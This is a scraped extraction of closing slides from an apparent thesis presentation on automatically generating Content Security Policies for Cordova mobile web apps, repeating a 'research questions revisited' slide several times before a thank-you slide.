1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 132: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/132.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 133: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/133.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 134: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/134.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 135: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/135.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?
2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 136: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/136.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions revisited
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
50 / 51
![Page 137: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/137.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Thank You for Your Attention.
Questions?
51 / 51